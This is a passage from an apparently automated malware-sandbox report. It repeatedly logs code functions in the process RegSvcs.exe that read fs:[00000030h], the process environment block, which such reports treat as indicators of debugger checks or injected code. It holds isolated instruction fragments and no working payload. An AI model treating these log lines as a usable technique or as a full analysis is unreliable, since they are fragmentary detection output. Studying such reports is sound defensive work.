          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h]8_2_00F802E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h]8_2_00F802E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h]8_2_00F802E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov eax, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov ecx, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov eax, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01048324 mov eax, dword ptr fs:[00000030h]8_2_01048324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F7A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104634F mov eax, dword ptr fs:[00000030h]8_2_0104634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A352 mov eax, dword ptr fs:[00000030h]8_2_0103A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01018350 mov ecx, dword ptr fs:[00000030h]8_2_01018350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h]8_2_00F802A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h]8_2_00F802A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h]8_2_00FF0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h]8_2_00FF0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h]8_2_00FF0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101437C mov eax, dword ptr fs:[00000030h]8_2_0101437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h]8_2_00FAE284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h]8_2_00FAE284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h]8_2_00F74260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h]8_2_00F74260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h]8_2_00F74260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6826B mov eax, dword ptr fs:[00000030h]8_2_00F6826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A250 mov eax, dword ptr fs:[00000030h]8_2_00F6A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76259 mov eax, dword ptr fs:[00000030h]8_2_00F76259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF8243 mov eax, dword ptr fs:[00000030h]8_2_00FF8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF8243 mov ecx, dword ptr fs:[00000030h]8_2_00FF8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6823B mov eax, dword ptr fs:[00000030h]8_2_00F6823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102C3CD mov eax, dword ptr fs:[00000030h]8_2_0102C3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h]8_2_010143D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h]8_2_010143D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov ecx, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h]8_2_0101E3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80218 mov eax, dword ptr fs:[00000030h]8_2_00F80218
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA63FF mov eax, dword ptr fs:[00000030h]8_2_00FA63FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]8_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]8_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h]8_2_00F8E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h]8_2_00F803E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F7A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h]8_2_00F783C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF63C0 mov eax, dword ptr fs:[00000030h]8_2_00FF63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h]8_2_0102A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h]8_2_0102A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104625D mov eax, dword ptr fs:[00000030h]8_2_0104625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h]8_2_00F68397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h]8_2_00F68397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h]8_2_00F68397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01020274 mov eax, dword ptr fs:[00000030h]8_2_01020274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h]8_2_00F9438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h]8_2_00F9438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h]8_2_00F6E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h]8_2_00F6E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h]8_2_00F6E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov ecx, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h]8_2_010062A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov ecx, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h]8_2_00FF035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]8_2_00FF2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010462D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72324 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C310 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F90310 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F704E5 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA44B0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFA4B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F764AB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76484 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC460 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9245A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6645D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C427 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F725E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F765D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A456 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE59C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4588 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72582 mov eax, dword ptr fs:[00000030h]
